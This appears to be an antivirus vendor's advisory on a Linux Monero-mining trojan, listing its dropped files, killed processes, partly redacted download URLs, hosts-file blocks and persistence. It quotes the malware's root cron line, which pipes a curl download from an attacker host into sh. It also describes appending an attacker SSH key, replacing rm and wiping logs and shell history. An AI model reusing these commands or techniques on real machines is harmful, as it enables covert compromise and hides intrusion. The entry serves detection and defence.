Trojan.Linux.MALXMR.UWEJO

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It connects to certain websites to send and receive information.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan drops the following files:

• {directory}/rzx → contains the new file name of its miner

It creates the following folders:

• /root/.ssh

Other System Modifications

This Trojan modifies the following file(s):

• /root/.ssh/authorized_keys → appends the attacker's SSH public-key

It deletes the following files:

• /tmp/ddg*
• /tmp/wnTKYg
• /tmp/qW3xT.2
• /tmp/ddgs.3013
• /tmp/ddgs.3012
• /tmp/2t3ik
• /tmp/root.sh
• /tmp/pools.txt
• /tmp/libapache
• /tmp/config.json
• /tmp/bashf
• /tmp/bashg
• /tmp/libapache
• /tmp/kworkerds
• /bin/kworkerds
• /bin/config.json
• /var/tmp/kworkerds
• /var/tmp/config.json
• /usr/local/lib/libjdk.so
• /tmp/.systemd-private-*
• /usr/lib/libiacpkmn.so.3
• /etc/init.d/nfstruncate
• /etc/init.d/ats
• /etc/zigw
• /tmp/zigw
• /etc/zjgw

Process Termination

This Trojan terminates the following processes if found running in the affected system's memory:

• wnTKYg
• ddg*
• stratum
• xmrig
• /var/tmp/java
• ddgs
• qW3xT
• t00ls.ru
• sustes
• Xbash
• hashfish
• .syslog
• xig
• systemctI
• tsm
• zigw
• zjgw
• Processes that use the following ports:
  • 3333
  • 4444
  • 5555
  • 6666
  • 7777
  • 3347
  • 14444
  • 14443

Download Routine

This Trojan connects to the following website(s) to download and execute a malicious file:

• http://w.{BLOCKED}n.com:43768/pvds
• http://w.{BLOCKED}n.com:43768/httpdz
• http://w.{BLOCKED}n.com:43768/migrations
• http://w.{BLOCKED}n.com:43768/rm
• http://w.{BLOCKED}n.com:43768/crontab.sh

It saves the files it downloads using the following names:

• {directory}/{random characters} - detected as Coinminer_MALXMR.SMGH2-ELF64
• {directory}/httpdz - detected as Backdoor.Linux.POPDZ.A
• {directory}/migrations - detected as Trojan.Linux.WATCHMINE.A
• /usr/bin/rm - detected as Trojan.SH.FAKERM.A

Other Details

This Trojan connects to the following website to send and receive information:

• http://w.{BLOCKED}n.com:43768/
• http://w.{BLOCKED}n.com:43768/
• https://pastebin.com/raw/{BLOCKED}WL

It does the following:

• It creates the following service:
  • Service name: ats
    Description: service
    Task to be run: nohup /etc/initdz > /dev/null &
• It creates a root cronjob to enable automatic execution of crontab.sh every 12 minutes:
  • Path: /var/spool/cron/root
    Content: */12 * * * * curl -fsSL http://w.{BLOCKED}i.xyz:43768/crontab.sh | sh
• It blocks all outgoing SSH connections on the following ports:
  • 3333
  • 5555
  • 7777
  • 9999
  • 14444
• It modifies the system's HOSTS files to prevent users from accessing the following websites:
  • mine.moneropool.com
  • xmr.crypto-pool.fr
  • monerohash.com
  • xmrpool.eu
  • pool.noobxmr.com
  • pool.minexmr.cn
  • xmr.poolto.be
  • monerohash.com
  • stratum.viaxmr.com
  • pool.monero.hashvault.pro
  • xmr-us.suprnova.cc
  • de.moriaxmr.com
  • de2.moriaxmr.com
  • fr.minexmr.com
  • de.minexmr.com
  • ca.minexmr.com
  • sg.minexmr.com
  • xmr.bohemianpool.com
  • xmr-usa.dwarfpool.com
  • monero.miners.pro
  • xmr.prohash.net
  • thyrsi.com
  • minerxmr.ru
  • zer0day.ru
  • minergate.com
  • pixeldra.in
  • w.3ei.xyz
  • w.21-3n.xyz
• It replaces the rm binary of the infected machine to prevent the user from deleting its components.
• It clears the following objects:
  • /root/.bash_history
  • /var/log/secure
  • /var/log/wtmp
  • /var/spool/mail/root
  • history
• If the user is root, {directory} will be set to /etc, /tmp otherwise.